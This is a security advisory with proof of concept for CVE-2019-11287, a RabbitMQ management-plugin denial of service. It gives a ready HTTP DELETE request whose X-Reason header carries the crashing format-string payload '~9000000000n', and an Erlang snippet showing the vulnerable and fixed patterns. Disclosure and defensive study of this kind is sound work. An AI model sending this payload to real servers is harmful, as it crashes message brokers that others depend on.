CVE-2019-11287: RabbitMQ Web Management Plugin DoS via Heap Overflow

Pivotal RabbitMQ, versions 3.7.x prior to 3.7.21 and 3.8.x prior to 3.8.1, and RabbitMQ for Pivotal Platform, 1.16.x versions prior to 1.16.7 and 1.17.x versions prior to 1.17.4, contain a web management plugin that is vulnerable to a denial of service attack.
The "X-Reason" HTTP Header can be leveraged to insert a malicious Erlang format string that will expand and consume the heap, resulting in the server crashing.

Affected Products             | Affected Versions
Pivotal RabbitMQ              | 3.7.x prior to 3.7.21 and 3.8.x prior to 3.8.1
RabbitMQ for Pivotal Platform | 1.16.x prior to 1.16.7 and 1.17.x prior to 1.17.4

Vendor Disclosure:

The vendor's disclosure and mitigation of this vulnerability can be found here.

Requirements:

For successful exploitation of the vulnerability, the attacker will require:

  • Credentials for the Web Management Plugin (e.g. guest:guest)
  • An MQTT connection which can be "Force Closed"

Proof Of Concept:

Step 1 - AMQP connection

Initiate, or wait for, an AMQP connection to be established to the server.

Step 2 - ReDoS

Click on the connection, insert the malicious payload in the "Reason" field, then click the "Force Close" button.
In this case the payload is "~9000000000n", an Erlang format-string directive that the backend will try to expand into a string containing 9000000000 newline characters.

Request

DELETE /api/connections/127.0.0.1%3A51115%20-%3E%20127.0.0.1%3A5672 HTTP/1.1
Host: 127.0.0.1:15672
content-type: application/json
authorization: Basic Z***TRUNCATED***=
X-Reason: ~9000000000n
Content-Length: 68
Cookie: m=2258:Z***TRUNCATED***=

{"name":"127.0.0.1:51115 -> 127.0.0.1:5672","reason":"~9000000000n"}

Note: Only the "X-Reason" HTTP Header is interpreted in an unsafe way by the server. The "reason" variable in the JSON payload does not affect the outcome in any way.
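The pattern behind this bug is a client-controlled value reaching io_lib:format/2 as the format string rather than as an argument. The following is an added illustration, not RabbitMQ's own code: the module name, function names and length limit are assumptions, and the vulnerable function only shows how a "~n" directive in the value is interpreted, while the hardened form treats the value as data and bounds its size.

```erlang
-module(close_reason).
-export([vulnerable_reason_text/1, safe_reason_text/1]).

%% Assumed upper bound for a client-supplied close reason (constructed value).
-define(MAX_REASON_LEN, 255).

%% Vulnerable pattern (illustrative): the untrusted value *is* the format
%% string, so a directive such as "~9000000000n" is interpreted and expanded
%% on the server's heap instead of being logged literally.
vulnerable_reason_text(Reason) when is_list(Reason) ->
    lists:flatten(io_lib:format(Reason, [])).

%% Hardened pattern: the value is passed only as an argument to a fixed
%% format string ("~ts" prints it verbatim), and its length is capped before
%% any formatting happens, so "~" sequences stay inert.
safe_reason_text(Reason) when is_list(Reason) ->
    Bounded = string:slice(Reason, 0, ?MAX_REASON_LEN),
    lists:flatten(io_lib:format("Closed via management plugin: ~ts", [Bounded])).
```

In a shell, close_reason:vulnerable_reason_text("a~nb") returns "a\nb" (the directive was interpreted), whereas close_reason:safe_reason_text("a~nb") keeps the literal characters "a~nb" in its output.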

Result

The result of this payload is that the RabbitMQ server on port 5672 and the RabbitMQ Web Management Plugin on port 15672 crash. The crash report can be found in "/var/log/rabbitmq/erl_crash.dump" and shows the failed heap allocation.

Note: The "top" tool can be used to see the spike in CPU and memory consumption of the RabbitMQ "beam.smp" process.